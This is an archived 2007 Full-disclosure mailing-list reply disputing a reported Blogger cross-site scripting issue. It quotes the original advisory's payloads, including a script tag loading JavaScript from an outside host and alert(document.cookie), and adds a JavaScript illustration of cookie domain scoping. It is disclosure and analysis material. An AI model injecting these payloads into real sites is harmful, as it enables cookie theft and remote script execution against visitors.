Re: [Full-disclosure] BLOGGER XSS VULNERABILITY
- To: Daniele Costa <info@xxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] BLOGGER XSS VULNERABILITY
- From: Susam Pal <susam@xxxxxxxx>
- Date: Sun, 12 Aug 2007 21:41:05 +0530
Why is this a vulnerability? I can't see a way by which an attacker can
insert JavaScript code into my blog.
> I've noticed that for any blog hosted at blogspot.com the cookie will
> not be shown.
The sensitive cookies are not maintained under blogspot.com, so allowing
JavaScript in blogspot.com doesn't look like a threat or vulnerability.
> Otherwise, if the blog is located inside your web site, the cookie
> will be shown.
But I am the only one who is inserting the JavaScript in my blog. So,
I'll end up stealing the cookies set for my domain. Why would I steal
cookies set for my domain? I already know them because it is my website.
Regards,
Susam Pal
http://susam.in/
Daniele Costa wrote, On Saturday 11 August 2007 10:52 PM:
> ------------------------------------------------------
> BLOGGER XSS VULNERABILITY
> ------------------------------------------------------
>
> Blogspot.com
>
> Homepage: http://www.blogspot.com
>
> and
>
> Blogger.com
>
> Homepage: http://www.blogger.com
>
> Affected files:
>
> Post's Input boxes
>
> ------------------------------------------------------
> XSS DETAILS
> ------------------------------------------------------
> XSS vuln via injecting javascript code into any post.
>
> Blogger doesn't sanitize user input during post process.
> Try injecting the following code into a post
>
> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
>
> or just the well known
>
> <SCRIPT>alert(document.cookie);</SCRIPT>
>
> or
>
> <SCRIPT >alert(document.domain);</SCRIPT>
>
>
> ------------------------------------------------------
> Proof Of Concept
> ------------------------------------------------------
>
> http://pocasiculezza.blogspot.com/
>
> -----------------------------------------------------
> HISTORY
> ------------------------------------------------------
> Discovered : 07/11/2007 by Daniele Costa
> Published : 07/11/2007 by Daniele Costa
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
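
The cookie-scoping argument in the reply above, as an added example that is not part of the original thread: it lists which cookies a script running on a given host could read through document.cookie. The .example hosts, the cookie names and the visibleToScript helper are constructed for illustration; Path and Secure are ignored, and the HttpOnly flag goes beyond what the thread discusses.

```javascript
// Constructed sample cookie jar. blogger.example stands in for the account
// host, blogspot.example for the hosted-blog domain, and myblog.example for
// a blog served from the owner's own site. All names are illustrative.
const jar = [
  { name: "account_session", domain: "blogger.example",    hostOnly: false, httpOnly: false },
  { name: "blog_theme",      domain: "blogspot.example",   hostOnly: false, httpOnly: false },
  { name: "site_sid",        domain: "www.myblog.example", hostOnly: true,  httpOnly: true  },
  { name: "site_prefs",      domain: "myblog.example",     hostOnly: false, httpOnly: false },
];

// RFC 6265 section 5.1.3 domain matching: the host equals the cookie domain,
// or the host is a name (not an IP address) ending in "." + cookie domain.
function domainMatches(host, cookieDomain) {
  const h = host.toLowerCase();
  const d = cookieDomain.toLowerCase().replace(/^\./, "");
  if (h === d) return true;
  const looksLikeIp = /^[\d.]+$/.test(h);
  return !looksLikeIp && h.endsWith("." + d);
}

// Names of the cookies that script on `host` can read via document.cookie.
function visibleToScript(host, cookies) {
  return cookies
    .filter((c) =>
      c.hostOnly
        ? host.toLowerCase() === c.domain.toLowerCase() // no Domain attribute: exact host only
        : domainMatches(host, c.domain))
    .filter((c) => !c.httpOnly) // HttpOnly cookies are sent to the server but hidden from script
    .map((c) => c.name);
}

// Script in a post on a hosted blog sees only what is scoped to that domain;
// the account cookie lives on a different registrable domain.
console.log(visibleToScript("someblog.blogspot.example", jar));
// Script in a post on a self-hosted blog sees the site's own script-readable cookies.
console.log(visibleToScript("www.myblog.example", jar));
```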